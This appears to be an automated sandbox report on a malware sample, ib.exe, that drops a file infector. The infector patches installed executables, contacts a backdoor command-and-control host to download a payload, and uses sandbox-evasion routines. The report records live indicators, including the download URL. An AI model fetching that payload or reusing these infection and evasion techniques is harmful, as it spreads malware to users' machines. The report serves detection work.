Source: C:\Program Files\7-Zip\Uninstall.exe |
Avira: detection malicious, Label: W32/Jadtre.B |
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe |
Avira: detection malicious, Label: W32/Jadtre.B |
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe |
Avira: detection malicious, Label: W32/Jadtre.B |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
ReversingLabs: Detection: 97% |
Source: C:\Program Files\7-Zip\Uninstall.exe |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe |
Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Joe Sandbox ML: detected |
Source: ib.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: |
Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe |
Source: |
Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe |
Source: |
Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
System file written: C:\Program Files\7-Zip\Uninstall.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, |
2_2_00CB29E2 |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, |
2_2_00CB2B8C |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ |
Jump to behavior |
Source: Network traffic |
Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:59334 -> 1.1.1.1:53 |
Source: Network traffic |
Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799 |
Source: global traffic |
HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E2130 Sleep,WSAStartup,WSAGetLastError,socket,WSAGetLastError,htons,inet_addr,setsockopt,sendto,sendto,WSAGetLastError,recvfrom,WSAGetLastError,sendto,WSAGetLastError,exit, |
0_2_003E2130 |
Source: global traffic |
HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive |
Source: hjErac.exe, 00000002.00000003.1687849172.0000000000830000.00000004.00001000.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmp |
String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE |
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net/ |
Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net/cH |
Source: hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar |
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGsf |
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGv |
Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarR |
Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarg |
Source: hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp |
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarq |
Source: Amcache.hve.2.dr |
String found in binary or memory: http://upx.sf.net |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.activestate.com |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.activestate.comHolger |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.baanboard.com |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.baanboard.comBrendon |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.develop.com |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.develop.comDeepak |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.lua.org |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.rftp.com |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.rftp.comJosiah |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.scintilla.org |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.scintilla.org/scite.rng |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.spaceblue.com |
Source: SciTE.exe.2.dr |
String found in binary or memory: http://www.spaceblue.comMathias |
Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: SciTE.exe.2.dr |
String found in binary or memory: https://www.smartsharesystems.com/ |
Source: SciTE.exe.2.dr |
String found in binary or memory: https://www.smartsharesystems.com/Morten |
Source: hjErac.exe.0.dr |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
Source: C:\Users\user\Desktop\ib.exe |
Process Stats: CPU usage > 49% |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428 |
Source: hjErac.exe.0.dr |
Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
Source: hjErac.exe.0.dr |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
Source: classification engine |
Classification label: mal100.spre.troj.evad.winEXE@6/11@1/2 |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, |
2_2_00CB119F |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03 |
Source: C:\Users\user\Desktop\ib.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\$InputBridge$ |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6996 |
Source: unknown |
Process created: C:\Users\user\Desktop\ib.exe "C:\Users\user\Desktop\ib.exe" |
|
Source: C:\Users\user\Desktop\ib.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\ib.exe |
Process created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exe |
|
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428 |
|
Source: C:\Users\user\Desktop\ib.exe |
Process created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\ib.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\ib.exe |
Section loaded: msvcp140.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\ib.exe |
Section loaded: vcruntime140.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\ib.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\ib.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\ib.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: ntvdm64.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: ib.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: ib.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: ib.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: ib.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: ib.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: ib.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: ib.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: |
Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe |
Source: |
Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe |
Source: |
Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr |
Source: ib.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: ib.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: ib.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: ib.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: ib.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Unpacked PE file: 2.2.hjErac.exe.cb0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW; |
Source: ib.exe |
Static PE information: section name: Hu |
Source: hjErac.exe.0.dr |
Static PE information: section name: .aspack |
Source: hjErac.exe.0.dr |
Static PE information: section name: .adata |
Source: Uninstall.exe.2.dr |
Static PE information: section name: EpNuZ |
Source: MyProg.exe.2.dr |
Static PE information: section name: PELIB |
Source: MyProg.exe.2.dr |
Static PE information: section name: Y|uR |
Source: SciTE.exe.2.dr |
Static PE information: section name: u |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003EBE7B push ebp; ret |
0_2_003EBE7E |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003EBE85 push 00000000h; ret |
0_2_003EC296 |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB1638 push dword ptr [00CB3084h]; ret |
2_2_00CB170E |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB600A push ebp; ret |
2_2_00CB600D |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB2D9B push ecx; ret |
2_2_00CB2DAB |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB6014 push 00CB14E1h; ret |
2_2_00CB6425 |
Source: ib.exe |
Static PE information: section name: Hu entropy: 6.93404046385773 |
Source: hjErac.exe.0.dr |
Static PE information: section name: .text entropy: 7.81169422100848 |
Source: Uninstall.exe.2.dr |
Static PE information: section name: EpNuZ entropy: 6.934379842605089 |
Source: MyProg.exe.2.dr |
Static PE information: section name: Y|uR entropy: 6.93494119851436 |
Source: SciTE.exe.2.dr |
Static PE information: section name: u entropy: 6.933703573716871 |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
System file written: C:\Program Files\7-Zip\Uninstall.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\ib.exe |
File created: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File created: C:\Program Files\7-Zip\Uninstall.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe |
Jump to dropped file |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\ib.exe |
Code function: GetForegroundWindow,GetWindowThreadProcessId,CreateThread,CloseHandle,Sleep,?_Xlength_error@std@@YAXPBD@Z,OpenProcess,K32GetProcessImageFileNameA,strstr,K32EnumProcessModulesEx,K32GetModuleFileNameExA,StrStrIA,Sleep,?_Xbad_function_call@std@@YAXXZ, |
0_2_003E2510 |
Source: C:\Users\user\Desktop\ib.exe |
Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep |
Source: C:\Users\user\Desktop\ib.exe |
Stalling execution: Execution stalls by calling Sleep |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes |
Source: C:\Users\user\Desktop\ib.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, |
2_2_00CB29E2 |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, |
2_2_00CB2B8C |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ |
Jump to behavior |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.2.dr |
Binary or memory string: vmci.syshbin |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware, Inc. |
